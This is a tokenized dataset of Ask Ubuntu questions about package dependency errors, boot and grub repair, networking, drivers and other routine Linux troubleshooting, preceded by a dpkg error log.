no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : error processing package emacsen-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of emacs24-common : emacs24-common depends on emacsen-common ( > = 1.4.10 ) ; however : package emacsen-common is not configured yet . dpkg : error processing package emacs24-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of emacs24-bin-common : emacs24-bin-common depends on emacs24-common ( = 24.3+1-2ubuntu1 ) ; however : package emacs24-common is not configured yet . dpkg : error processing package emacs24-bin-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of emacs24 : emacs24 depends on emacs24-bin-common ( = 24.3+1-2ubuntu1 ) ; however : package emacs24-bin-common is not configured yet . dpkg : error processing package emacs24 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of xemacs21-mule : xemacs21-mule depends on emacsen-common ; however : package emacsen-common is not configured yet . dpkg : error processing package xemacs21-mule ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of xemacs21 : xemacs21 depends on xemacs21-mule ( > = 21.4.22-4ubuntu3 ) | xemacs21-mule-canna-wnn ( > = 21.4.22-4ubuntu3 ) | xemacs21-nomule ( > = 21.4.22-4ubuntu3 ) ; however : package xemacs21-mule is not configured yet . package xemacs21-mule-canna-wnn is not installed . package xemacs21-nomule is not installed . dpkg : error processing package xemacs21 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of xemacs21-support : xemacs21-support depends on emacsen-common ; however : package emacsen-common is not configured yet . xemacs21-support depends on xemacs21 ( = 21.4.22-4ubuntu3 ) ; however : package xemacs21 is not configured yet . dpkg : error processing package xemacs21-support ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gettext-el : gettext-el depends on emacs24 | emacs23 | emacsen ; however : package emacs24 is not configured yet . package emacs23 is not installed . package emacsen is not installed . package xemacs21-mule which provides emacsen is not configured yet . package xemacs21-mule-canna-wnn which provides emacsen is not installed . package emacs23 which provides emacsen is not installed . package emacs24 which provides emacsen is not configured yet . dpkg : error processing package gettext-el ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of emacs : emacs depends on emacs24 | emacs24-lucid | emacs24-nox ; however : package emacs24 is not configured yet . package emacs24-lucid is not installed . package emacs24-nox is not installed . dpkg : error processing package emacs ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of xemacs21-bin : xemacs21-bin depends on xemacs21-support ( = 21.4.22-4ubuntu3 ) ; however : package xemacs21-support is not configured yet . dpkg : error processing package xemacs21-bin ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : emacsen-common emacs24-common emacs24-bin-common emacs24 xemacs21-mule xemacs21 xemacs21-support gettext-el emacs xemacs21-bin e : sub-process /usr/bin/dpkg returned an error code ( 1 )
522007	trouble replacing dying vista with ubuntu	i want to replace my hardly working vista with ubuntu . i downloaded the 32 bit ubuntu from http : //www.ubuntu.com/download/desktop i got it as a comressed file . i decompressed it using winrar . i then followed some steps that i cant seem to find right now , wich basically just said burn it to a cd and restart , but vista keeps booting .
522012	compatibilty with predictive dialers	does ubuntu work with predictive dialing systems ? they are web based . does it work with voip calling as well ? please advise
522018	no more working os after failed update	the goal is to recover my laptop , but primarly the files stored into it . as i need some files for work ! so this is what happened , all fairly simple and there are too many topic here on ubuntu that helped people out fix it . ( but most of those people are already way more advanced in fixing linux then i am ) ubuntu update > power out > update failed > no more working os . i tried : sudo apt-get update sudo apt-get upgrade recieved 'failed to fetch ' error next i tried the following steps : update failure if there was an update that made your system non-bootable and they have fixed it in the repositories , you can use the live cd to run apt-get to get the new files to fix your system . boot the ubuntu live cd . press ctrl-alt-f1 sudo mount /dev/sda1 /mnt sudo mount -- bind /dev /mnt/dev sudo mount -- bind /proc /mnt/proc sudo mount -- bind /sys /mnt/sys sudo chroot /mnt apt-get update apt-get upgrade if you have trouble accessing your network after chroot , you probably use dhcp and can work around this by adding opendns name servers to your /etc/resolv.conf after you use chroot : nameserver 208.67.222.222 nameserver 208.67.220.220 oke so im at the last step ! this part : if you have trouble accessing your network after chroot , you probably use dhcp and can work around this by adding opendns name servers to your /etc/resolv.conf after you use chroot : nothing helpfull that could explain me how to actualy finish that last step . so i found another help topic that matches my new problem and tried the following : sudo vi /etc/resolvconf/resolv.conf.d/tail # add just these two lines > > nameserver 8.8.8.8 nameserver 8.8.4.4 then save the file and restart the service : sudo /etc/init.d/resolvconf restart 8.8.8.8 and 8.8.4.4 are just google 's name servers . you should be able to add in your own isp 's if you want . if you do n't like vi , use nano or vim . so im stuck on editing a simple text file , as when i type in a new command nothing happens , so i dont know how to close/save the file to get back to the root command screen/terminal . ive been going on these fixes over and over again , checking multiple topics for different anywhere , but all of them tell the same solutions i posted above .
522020	problem with installing systemc-2.3.1 on ubuntu 14	i am trying to install systemc-2.3.1 on ubuntu 14 . it installs completely and successfully . but when i try to compile a simple hello world systemc program i have this error in terminal : `` hello.cpp:2:21 : fatal error : systemc.h : no such file or directory '' . does anyone know waht 's the problem ? thanks .
522021	how to update grub in ubuntu 14.04	i deleted a portion of my drive accidentally , then i had the `` grub rescue '' problem . but i can start my system.. i have to enter a set of commands each time i boot , to rescue the grub . is there any way to update & /or re-add the missing grub file ? ? i use hp pavilion g6 laptop , with windows 8.1 side loaded with ubuntu 14.04 .
522024	making lammps with compilier	making lammps with compillier mpich2 gives error /usr/bin/mpic++ : line 268 : c++ : command not found when using g++ -- g++ command not found . how provide a work of mpicc++ ? the machine answer is below . amo @ amo-system-product-name ~/downloads/lammps/src $ make twocore make [ 1 ] : entering directory /home/amo/downloads/lammps/src/obj_twocore' mpic++ `` `` -dlammps_gzip -dlammps_png -i../usr/lib/mpich2/include -c angle_charmm.cpp /usr/bin/mpic++ : line 268 : c++ : command not found make [ 1 ] : *** [ angle_charmm.o ] error 127 make [ 1 ] : leaving directory/home/amo/downloads/lammps/src/obj_twocore' make : * [ twocore ] error 2
522026	trying to install cifs-utils - the attempt created dependency hell	trying to mount a smb share in linux ( 12-10 , kernel 3.5.0-17-generic ) - i tried to install mounting utils sudo apt-get install cifs-utils response / error : ... preparing to unpack ... /locales_2.19-10_all.deb ... unpacking locales ( 2.19-10 ) over ( 2.13+git20120306-3 ) ... dpkg : error processing archive /var/cache/apt/archives/locales_2.19-10_all.deb ( -- unpack ) : trying to overwrite '/usr/sbin/update-locale ' , which is also in package libc-bin 2.15-0ubuntu20 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to unpack ... /libc-dev-bin_2.19-10_i386.deb ... unpacking libc-dev-bin ( 2.19-10 ) over ( 2.15-0ubuntu20 ) ... preparing to unpack ... /libc6-dev_2.19-10_i386.deb ... unpacking libc6-dev : i386 ( 2.19-10 ) over ( 2.15-0ubuntu20 ) ... dpkg : considering deconfiguration of locales , which would be broken by installation of libc6 : i386 ... dpkg : yes , will deconfigure locales ( broken by libc6 : i386 ) preparing to unpack ... /libc6_2.19-10_i386.deb ... de-configuring locales ( 2.13+git20120306-3 ) ... checking for services that may need to be restarted ... checking init scripts ... unpacking libc6 : i386 ( 2.19-10 ) over ( 2.15-0ubuntu20 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : /var/cache/apt/archives/locales_2.19-10_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) me : sudo apt-get install libc6 : i386 response / error : reading package lists ... done building dependency tree reading state information ... done libc6 is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libc6 : recommends : libc6-i686 breaks : locales ( < 2.19 ) libnih1 : predepends : libc6 ( < 2.16 ) but 2.19-10 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . me : sudo apt-get -f install response / error : preparing to unpack ... /locales_2.19-10_all.deb ... unpacking locales ( 2.19-10 ) over ( 2.13+git20120306-3 ) ... dpkg : error processing archive /var/cache/apt/archives/locales_2.19-10_all.deb ( -- unpack ) : trying to overwrite '/usr/sbin/update-locale ' , which is also in package libc-bin 2.15-0ubuntu20 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/locales_2.19-10_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) idk how to get around these errors ... how can i do a simple operation like mount ? update : sudo apt-get update response ... . fetched 233 kb in 2min 14s ( 1,730 b/s ) reading package lists ... done me : sudo apt-get upgrade respone - error reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc6 : recommends : libc6-i686 breaks : locales ( < 2.19 ) libnih1 : predepends : libc6 ( < 2.16 ) but 2.19-10 is installed e : unmet dependencies . try using -f. new update - looked at install history - and the took a second look at the install above ... commandline : apt-get install cifs-utils install : python-crypto : i386 ( 2.6.1-5+b1 , automatic ) , python-dnspython : i386 ( 1.11.1-1 , automatic ) , libaio1 : i386 ( 0.3.109-4 , automatic ) , samba-vfs-modules : i386 ( 4.1.11+dfsg-1 , automatic ) , libtasn1-6 : i386 ( 4.1-2 , automatic ) , python-ntdb : i386 ( 1.0-5 , automatic ) , tdb-tools : i386 ( 1.3.0-1.1 , automatic ) , python-ldb : i386 ( 1.1.17-1 , automatic ) , python-talloc : i386 ( 2.1.1-2 , automatic ) , libc6-i686 : i386 ( 2.19-10 , automatic ) , libpython2.7-stdlib : i386 ( 2.7.8-6 , automatic ) , python-tdb : i386 ( 1.3.0-1.1 , automatic ) , attr : i386 ( 2.4.47-1 , automatic ) , libkdc2-heimdal : i386 ( 1.6~rc2+dfsg-8 , automatic ) , libntdb1 : i386 ( 1.0-5 , automatic ) , libtevent0 : i386 ( 0.9.21-1 , automatic ) , libpython2.7-minimal : i386 ( 2.7.8-6 , automatic ) , libhogweed2 : i386 ( 2.7.1-3 , automatic ) , libpython-stdlib : i386 ( 2.7.8-1 , automatic ) , samba : i386 ( 4.1.11+dfsg-1 , automatic ) , libhdb9-heimdal : i386 ( 1.6~rc2+dfsg-8 , automatic ) , python-samba : i386 ( 4.1.11+dfsg-1 , automatic ) , libldb1 : i386 ( 1.1.17-1 , automatic ) , libgnutls-deb0-28 : i386 ( 3.3.7-2 , automatic ) , samba-dsdb-modules : i386 ( 4.1.11+dfsg-1 , automatic ) , libdb5.3 : i386 ( 5.3.28-6 , automatic ) , winbind : i386 ( 4.1.11+dfsg-1 , automatic ) , samba-libs : i386 ( 4.1.11+dfsg-1 , automatic ) upgrade : libtalloc2 : i386 ( 2.0.7+git20120207-1 , 2.1.1-2 ) , libnih-dbus1 : i386 ( 1.0.3-4ubuntu11 , 1.0.3-4.3 ) , smbclient : i386 ( 3.6.6-3ubuntu5 , 4.1.11+dfsg-1 ) , libc-dev-bin : i386 ( 2.15-0ubuntu20 , 2.19-10 ) , python2.7 : i386 ( 2.7.3-5ubuntu4 , 2.7.8-6 ) , python-minimal : i386 ( 2.7.3-0ubuntu7 , 2.7.8-1 ) , libsmbclient : i386 ( 3.6.6-3ubuntu5 , 4.1.11+dfsg-1 ) , python2.7-minimal : i386 ( 2.7.3-5ubuntu4 , 2.7.8-6 ) , libp11-kit0 : i386 ( 0.13-1 , 0.20.3-2 ) , samba-common-bin : i386 ( 3.6.6-3ubuntu5 , 4.1.11+dfsg-1 ) , locales : i386 ( 2.13+git20120306-3 , 2.19-10 ) , python : i386 ( 2.7.3-0ubuntu7 , 2.7.8-1 ) , libp11-kit-dev : i386 ( 0.13-1 , 0.20.3-2 ) , libpython2.7 : i386 ( 2.7.3-5ubuntu4 , 2.7.8-6 ) , libwbclient0 : i386 ( 3.6.6-3ubuntu5 , 4.1.11+dfsg-1 ) , libc6-dev : i386 ( 2.15-0ubuntu20 , 2.19-10 ) , cifs-utils : i386 ( 5.5-1ubuntu1 , 6.4-1 ) , samba-common : i386 ( 3.6.6-3ubuntu5 , 4.1.11+dfsg-1 ) , libc6 : i386 ( 2.15-0ubuntu20 , 2.19-10 ) , libnih1 : i386 ( 1.0.3-4ubuntu11 , 1.0.3-4.3 ) error : sub-process /usr/bin/dpkg returned an error code ( 1 ) end-date : 2014-09-09 09:07:10 this is so incredibly weird - it seems that before running the command apt-get install cifs-utils i had all the correct versions of everything ... yes old but functional ... i had libc6 : i386 ( 2.15-0ubuntu20 ) and libc6-dev : i386 ( 2.15-0ubuntu20 ) then the installer upgraded to 2.19 and then complained that the version 2.19 is too high ... and what is worse , it seems that my system is now broken and i will never be able to install anything ? this is crazy because i had to put a lot of effort into installing specific development tools and sdks required ... i hope there is a way to downgrade libc6 ?
522029	vga to usb monitor cable duel monitors on laptop	my vga port stopped working on my laptop . i got a vga to usb wire any way to use it ? i plugged it in screen comes on then goes to standby . running ubuntu 14.04 any ideas or do i need a special wire to do that
522031	what can i do to make my wireless mouse work ?	my wireless mouse does n't work at all on ubuntu 14.04 . the weird thing is that it has worked the first time i tried it ! ! ( at the moment it works fine on ubuntu 12.04 ) . i know the system recognize the usb receiver , but it seems that it does n't communicate with the mouse . here is my lsusb -t niccolo @ niccolo-pc : ~ $ lsusb -t / : bus 02.port 1 : dev 1 , class=root_hub , driver=ehci-pci/2p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/6p , 480m |__ port 1 : dev 4 , if 0 , class=human interface device , driver=usbhid , 1.5m |__ port 1 : dev 4 , if 1 , class=human interface device , driver=usbhid , 1.5m |__ port 3 : dev 3 , if 0 , class=wireless , driver=btusb , 12m |__ port 3 : dev 3 , if 1 , class=wireless , driver=btusb , 12m |__ port 3 : dev 3 , if 2 , class=vendor specific class , driver= , 12m |__ port 3 : dev 3 , if 3 , class=application specific interface , driver= , 12m / : bus 01.port 1 : dev 1 , class=root_hub , driver=ehci-pci/2p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/6p , 480m |__ port 4 : dev 3 , if 0 , class=video , driver=uvcvideo , 480m |__ port 4 : dev 3 , if 1 , class=video , driver=uvcvideo , 480m
522032	long net configuration during boot -- 3 minutes ( dsl-connection works normally )	i make net dsl-connection in linux -mint 13 maya mate . it work normally . but machine spend 3 minutes for net configuration during boot . how to exclude net configuration ?
522033	what 's the state of mono ( & monodevelop ) on linux ( specially on ubuntu ) ?	recently i 've starting developing using xamarin studio on windows ( using gtk # ) , but i want to ensure portability to mac os x and linux distros , specially debian and ubuntu . i 've seen that mono on windows it 's outdated ( version 3.2.8 , while the current last `` stable '' version is the 3.8 ) , and in ubuntu we have a similar situation . in the next release ( 14.10 , utopic unicorn ) the mono packages are still in the 3.2.8 version ... anyone knows why ? license problems ? new intellectual property risks ? the 3.4 version was released on march of this year . i could understand that the 3.6 or 3.8 versions are considered `` too recent '' ( too few testing time ... ) , but we still have the 3.4 version , which is pretty `` old '' ( they had a complete release cycle to include it ) . and we have the problem with gtk # 3 too , i could n't find a roadmap with date approximations ... i 'll be grateful for any information about the state of things on this technology stack . thanks in advance ! : ) .
522034	switch between windows with touchegg	i do n't think that there 's a solution but i will ask anyway . for example i have 3 opened windows and i would like to switch between them using trackpad . i have this in my config file : < gesture type= '' drag '' fingers= '' 3 '' direction= '' left '' > < action type= '' send_keys '' > alt+tab < /action > < /gesture > < gesture type= '' drag '' fingers= '' 3 '' direction= '' right '' > < action type= '' send_keys '' > alt+tab < /action > < /gesture > but the problem is that it only switches between 2 windows ( the current and the last used ) . so in this case , the third one will never be shown : / .
522038	how do i get 144hz monitor refresh rate to work with the open source ati driver ?	with the open source ati drivers , when i set 144hz in xrandr i get strange full-screen stuttering when i move some windows ( especially my chrome browser , but other windows as well ) . i do n't get these in the proprietary drivers , and xvidtune shows the same modeline for both sets of drivers at 144hz . how do i get the open source ati drivers to drive my monitor at 1920x1080 @ 144hz ? as far as i can tell , both of them are trying to set a very high pixel clock ( ~325mhz ) , however the ati proprietary drivers do so without any problems , whereas the open source drivers have trouble . i 've tried both the ubuntu 14.04 vanilla drivers , as well as the xorg-edgers drivers , still with no luck . 120hz runs just fine for both sets of drivers . the `` default '' in xrandr for the open source drivers is 60hz for some reason . the reason i am bothering is the proprietary drivers cause xorg/the computer to freeze when i alt tab from fullscreen games ( after a few times , sometimes the first time ) , but the open source drivers do n't . environment/hardware : ubuntu 14.04 gigabyte radeon r9 270x benq xl2720z ( 144hz 1920x1080 ) here is the modeline i am trying to set ( according to xvidtune -show after i use xrandr to set the refresh rate ) . it shows up the same in both the proprietary driver and the open source driver with the same values : '' 1920x1080 '' 325.08 1920 1944 1976 2056 1080 1083 1088 1098 +hsync +vsync and here is the xrandr command i 'm using to set the refresh rate : xrandr -- rate 144
522040	how to install on ubuntu server 12.04.5 amd64 imagemagick : i386 ?	help me please ! apt-get install imagemagick : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : imagemagick : i386 : depends : libmagickcore4 : i386 ( > = 8:6.6.9.7 ) but it is not going to be installed depends : libmagickwand4 : i386 ( > = 8:6.6.9.7 ) but it is not going to be installed recommends : libmagickcore4-extra : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages .
522041	trouble starting ubuntu	in trying to install ubuntu , when i boot my flash drive my computer crashes . the farthest i got was the menu and then my computer just shuts off .
522042	enable bluetooth at startup on 14.04	first of all sorry if there is a duplicate , i haven been able to find it . i have found a huge lot of questions in the other sense : disabling bt , but that 's not what i want . i would like to know how to get my bt working as soon as possible in order to be able to type in my password at login or at least have it working when the desktop loads . my machine is a hp probook 4515s . i am almost sure that the bt is linked to the wifi card so that it may be necessary to have that first enabled . would it be possible to just change the startup order of the wifi service in /etc/init.d ? in any case , i still need to cajole the bluetooth thingy to wake up as soon has he can ... and while i am trying to rtfm as hard as possible , i just find a ton of people asking how to disable it while i want it the other way around : ) thx mates
522043	does deleting the interfaces config file reset ifconfig to default ( dhcp )	okay , so i have a remote ubuntu server ( 14.04 ) . yesterday , i tried changing some network configs in /etc/network/interfaces ... yeah ... you get the picture ... now i ca n't remote into it . i do however have someone at that location , who could change the configs for me ... my 12 year old little sister ( yep , that 's a better option than asking my mum ) ... i was thinking of the easiest way that i could explain to her , which will allow me to gain access to my server again . if i got her to rm /etc/network/interfaces , and then restart the server , would it automatically create a default one , and in turn get an ip from dhcp ? also , if anyone has any other suggestions on how i can gain access , i 'd be glad to hear : d ( i do have access to another server on the same network )
522049	volume automatically changes	using ubuntu 14.04 , my sound volume changes itself , going up and down , sometimes muting the sound altogether . i have disabled auto-mute option in alsamixer , but no luck .
522050	mastering chemistry and ubuntu 14.04	for my general and analytical chemistry course at college there is a site called mastering chemistry , made by pearson , that features different questions types . when i went to solve some problems , i was told that i needed to download and install java . i already have java , and all of the other questions have worked . i am running xfce on ubuntu 14.04 .
522051	how to list all symbolic links in a directory	i have a symbolic link in my /var/www/ directory that links to wordpress . when i run the command ls -la from the /var/www/ directory the link to wordpress does n't show up . is there a way to list all of the symbolic links that are in a directory ?
522052	how to use grub rescue to fix a broken ubuntu system	i am trying to fix my broken ubuntu partition table through grub rescue . i know that my boot partition is /dev/sda5 as it contains the following files in its /boot directory : vmlinuz-3.13.0-24-generic initrd.img-3.13.0-24-generic i saw the following grub-rescue procedure at some linux-support sites but i have n't been able to use it . any help will be much appreciated . set root= ( hd0,5 ) /boot insmod linux linux ( hd0,5 ) /boot/vmlinuz-3.13.0-24-generic initrd ( hd0,5 ) /boot/initrd.img-3.13.0-24-generic boot responses from grub-rescue : command is accepted ok. linux is declared an unknown filesystem linux is declared an unknown command initrd is declared an unknwon command boot is declared an unknown command
522057	how do i reset an icc profile in ubuntu ?	i was playing with the color manager for my display and things went too far . i would like to undo applied profiles , or set it to default .
522058	installing ubuntu alongside with windows 7	i want to install `` ubuntu 14.04.1 tls amd64 '' alongside with `` windows 7 ultimate x64 '' on a dell inspiron with i5/6gb/500gb . first of all i installed windows 7 . the partitions are : 1 : 100mb system reserved 2 : 80gb windows installation 3 : all the rest is unallocated space ( appr . 380gb ) when i boot from ubuntu usb drive i choose to try ubuntu and everything goes well , and in the left sidebar i got the two partitions 1 & 2 . the third partition does n't show because it 's unallocated space . now when i want to install ubuntu , i chose `` something else '' and instead of getting the two ntfs partitions , i only got this : /dev/sda free space 500107 mb /dev/sdb when i select `` free space '' and make the three partitions `` / '' & `` swap '' & `` home '' i get windows gone forever . when using gparted , i got a `` libparted warning . /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table as it should ... . '' i close the warning and gparted shows me the whole disk as unallocated . now how to solve this . thanks .
522060	how improve pixel/resolution line using gimp ?	how can i improve pixel/resolution line using gimp in this file below ? it is very small and i want to increase it . thanks !
522062	install a different version from what 's on my live usb	i have a 12.04 32-bit live usb . i want to install 12.04 64-bit on my desktop and i 'd rather not burn a usb image all over again just to install ubuntu once ( most of my machines require 32-bit for reasons i wo n't get into ; it 's only my desktop that wants 64-bit ) . is it possible to just use my existing live usb to install a different version of ubuntu ?
522068	how to watch apple videos ( 2014 )	i am rather new to ubuntu ( i have ubuntu 14.04 ) so sorry if this is a bit amatuerish . so apple 's new live event for unsupported os 's is just a live stream of banners and video updates , but i ca n't play any of the videos . on chrome i just get a `` missing plugin '' image , with no prompt to download any software . i tried installing the restricted-extras-package but it still wo n't work , and many of the links for quicktime go to this uninformative webpage about how all the plugins were deprecated . i 'd rather not hunt and peck for every media source as this askubuntu answer suggests , so is there some other way ? edit : firefox does n't seem to work either
522069	netbook is slowly with a ssd . how can i enable ahci ?	i have this problem , my netbook has a similar speed with a mechanic hd and ssd hd . i 'm thinking the problem is that the ssd hd is in ide mode : costales @ laptop : ~ $ dmesg | grep -i ahci costales @ laptop : ~ $ my netbook is the lg x110 and there is n't an ahci option in its bios : ( i found a driver for windows xp , then i 'm thinking the bios has the ahci enabled by default and i can set the hd setting by software ( ? ) . i searched how to force ahci in ( x ) ubuntu 14.04 and i find docs just for 12.04 , and the config file does n't exist in 14.04 : costales @ laptop : ~ $ cat /etc/mount/conf.cfg cat : /etc/mount/conf.cfg : no such file or directory costales @ laptop : ~ $ how could i force ahci in xubuntu 14.04 ? thanks in advance ! !
522070	how do i install windows 8.1 on my linux ubuntu using usb install ?	i do n't want to use ubuntu anymore . i am very new to this system and find windows easier ... i have the windows 8.1 ios file installed into the usb using the `` windows 7 usb/dvd '' the usb works fine with my pc which runs on windows 7 but my ubuntu does n't work .
522071	ubuntu 14.04 shutdown and restart missing	after fresh clean install when i click right top gear icon and select shutdown from menu then a window appears with two big buttons : restart shutdown now if i click right top gear icon and select shutdown from menu then a window appears with two big buttons : lock logout no shutdown nor restart want to restore the original behavior , restart and shutdown , need not lock and logout
522076	cloning xv6 repository using git under proxy	i have to clone xv6 repository using git . i am executing following command : git clone git : //pdos.csail.mit.edu/xv6/xv6.git i have configured git for http/https but how do i configure it for git type ? so that i will be able to execute above command successfully . thanks !
522078	windows error code 0xc0000225 after dual booting ubuntu	after finally being able to install and get ubuntu to dual boot , i went back to windows to get some files to transfer and i got the error code above . when installing ubuntu i chose the something else option and created the partitions myself . how do i get windows to start working again ?
522087	ubuntu server running behind asus router ca n't reach network ( dhcp issue ? )	running a ubuntu server through my home network , and it 's also utilizing a dyndns , which i presume ( yes , i 'm 'tech dumb ' ) is configured on the server . the settings were fine on various routers , until i recently purchased an asus n66u router ( http : //www.asus.com/us/networking/rtn66u/specifications/ ) . usually i just plug the server into the router , forward whatever ports to the the server ip , then i 'm off to the races . this time , i get a 'network unreachable error when it tries to connect on start-up . it then just eventually loads the command line as usual , but without any connectivity . i can still ping the home network , but can not ping anything internally . thus far , reading through other posts , i can only think that it has something to do with the manual settings that the server uses to connect to the net ( which my old roommate set for me when we built it ) . i did notice that the ip address of the server has changed , but i have n't done anything beyond making sure this is the address used via port-forwarding . regardless , the server itself ca n't ping out , so it 's not a port-forwarding issue i guess . i 've been working with the ipconfig commands , which does show that the `` eth1 is configured . '' additionally , i did attempt to manually give it a new gateway ip ( using the 'route ' command ) , but that did not seem to do anything , even though i think i did it correctly . ( 1 ) is this a simple router settings issue ? this thing has a bunch of bells and whistles , but i 'm not sure what i should change . i turned off dlna , etc . thinking that was going to help ( 2 ) maybe it 's as simple as giving the server its old internal ip address back ? if so , how can i ensure that the router gives it that ip . ( 3 ) or maybe it requires revisions in the network files ( i 've looked at the network hosts file , etc. , but am hesitant to change something i do n't understand ) ? update 1 ( 09/10/2014 ) route ân : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 100 0 0 eth1 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 ifconfig : eth1 link encap : ethernet hwaddr 00:25:90 : d4 : e9:38 inet addrr : 192.168.1.2 bcast : 192.168.1.2555 mask : 255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collissions:0 txqueuelen:1000 rx bytes:0 ( 0.0b ) tx byes:0 ( 0.0b ) interrupt:16 memory : df900000-920000 lo link encap : local loopback inet addrr : 127.0.0.1 mask : 255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:324968 errors:0 dropped:0 overruns:0 frame:0 tx packets:322968 errors:0 dropped:0 overruns:0 carrier:0 collissions:0 txqueuelen:1000 rx bytes:55193168 ( 55.1mb ) tx byes:55193168 ( 55.1mb ) update 2 ( 09/11/2014 , 12:25am ) ping 8.8.8.8 : ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data from 192.168.1.2 icmp_seq_1 destination host unreachable from 192.168.1.2 icmp_seq_1 destination host unreachable âś contents of /var/lib/dhcp/dhcp.leases : var/lib/dhcp/dhcp.leases/dhclient.leases var/lib/dhcp/dhcp.leases/dch/dhclient.eth1.leases update 2 ( 09/12/2014 , 6:00pm ) contents of `` cat /var/lib/dhcp/dhclient.eth1.leases '' lease { interface `` eth1 '' ; fixed-address 192.168.1.2 ; option subnet-mask 255.255.255.0 ; option routers 192.168.1.1 ; option dhcp-lease-time 86400 ; option dhcp-message-type 5 ; option domain-name-servers 192.168.1.1 ; option dhcp-server-identifier 192.168.1.1 ; renew 5 2014/09/12 03:03:47 ; rebind 5 2014/09/12 03:03:47 ; expire 5 2014/09/12 03:03:47 ; } contents of `` /etc/hosts/ '' : 127.0.0.1 localhost
522088	when using the touchpad ubuntu 14.04 freezes	when i use the touchpad on pcspecialist optimus 13.3 it completely freezes ubuntu and the only option i have is to hard power off . this does n't occur when i use a usb mouse .
522090	laptop consuming battery with lid closed ?	i have an asus x550 laptop , with xubuntu 14.04.1 installed . i used to close the lid when i stopped working , leaving all my documents open . when i returned and opened the lid , my session was as i had left it , and the battery had not been consumed . in the last few days , when open the lid , i find that the battery is almost run out . why can this be happening ?
522091	change desktop background does not work in 14.04	the usual desktop right click - > change desktop background option does not open the wallpapers dialog box . this may be unrelated , but i installed the nemo package . the following is the result of uname -a : linux konoha 3.13.0-35-generic # 62-ubuntu smp fri aug 15 01:58:42 utc 2014 x86_64 x86_64 x86_64 gnu/linux tried restarting the system and the problem persists . should this be raised as a bug in launchpad ?
522093	crontab not executing script with curl	i have a cron that 's set to run every ten minutes that works fine if i execute the file manually by entering php register.php but , my cron will not execute this file once it includes anything curl related . my cron is as follows */10 * * * * /usr/bin/php /var/www/html/register.php i know that the cron is getting the correct file because at the very top of it , i put php 's mail function to send me an email so that i know it was executed . but , anything curl related will not execute . there are n't any global variables or server variables in the script , so that is n't the reason . i 've checked both the crontab and the php error logs and nothing is there pertaining to this issue .
522095	how to remove xmonad and bluetile from ubuntu 14.04	how can i remove xmonad and blue tile from ubuntu 14.04 ?
522098	ubuntu almost broke my computer	ubuntu almost broke my computer . i installed ubuntu which made my screen glitch out and when i restarted my computer i got bsod twice and at one point i thought it deleted my os . windows opened startup repair where it wanted me to find a windows boot . and it does n't open the multi-boot menu when i boot the computer up .
522099	ubuntu 14.04 logs out every 5 minutes	i have ubuntu 14.04 . today suddenly it started to log out abruptly every 5 minutes . it was running fine before . but now i can not even read the error messages.. what should i do.. edit : i noticed that it happens when i run applications like firefox or compizconfig settings manager . my graphics card driver is nvidia binary driver- version 331.89 from nvidia-331 , graphic cards on my system are intel corporation 4th gen core processor integrated graphics controller and nvidia geforce 750m . currently i am using intel
522100	capslock remapped with tweak tool . keyboard shortcuts not working on startup	i used the gnome-tweak-tool to remap my capslock key as a super key . shortcut keys involving the super key do not work upon system restart . ( however my keyboard shortcuts under launchers for things like the terminal [ which for me is super+5 ] still work . also , scripts that i made in autokey which use the super key still work for me ) to get a shortcut key to work again i have to go into the compizconfig settings manager and disable then re-enable the key combination . alternatively ( and what i 've been doing now ) , i can log out and log back in to the computer and all the shortcut keys involving super will be working . does anybody how i can get the keyboard shortcuts to work on startup ?
522102	what would be the alternatives for thunar file explorer ?	i 'm looking for something basic to just browse my movie and tv show files etc . so i need something light and simple . im pretty new to linux so something that is pretty easy to get around with . as stated below my machine is pretty limited . i 'm using a limited machine . ibm thinkpad t43 with intel 2ghz processor and 2gb of ram oh im using xubuntu by the way
